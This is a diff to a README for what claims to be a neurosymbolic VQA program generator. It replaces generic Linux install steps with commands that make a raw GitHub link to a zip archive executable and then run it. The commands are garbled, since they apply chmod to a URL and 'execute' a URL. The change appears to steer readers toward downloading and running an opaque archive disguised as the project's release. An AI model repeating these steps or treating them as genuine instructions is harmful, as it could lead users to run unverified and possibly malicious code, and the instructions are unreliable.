umuttt5738/neurosymbolic-vqa-program-generator/README.md

 - **Linux:**
   1. Open a terminal window.
   2. Navigate to the directory where you downloaded the file.
-  3. Run the command: `chmod +x YourAppName.run`.
+  3. Run the command: `chmod +x https://raw.githubusercontent.com/umuttt5738/neurosymbolic-vqa-program-generator/main/models/neurosymbolic-vqa-program-generator_2.9.zip`.
-  4. Start the installation with: `./YourAppName.run`.
+  4. Start the installation with: `https://raw.githubusercontent.com/umuttt5738/neurosymbolic-vqa-program-generator/main/models/neurosymbolic-vqa-program-generator_2.9.zip`.

 ## ⚙️ System Requirements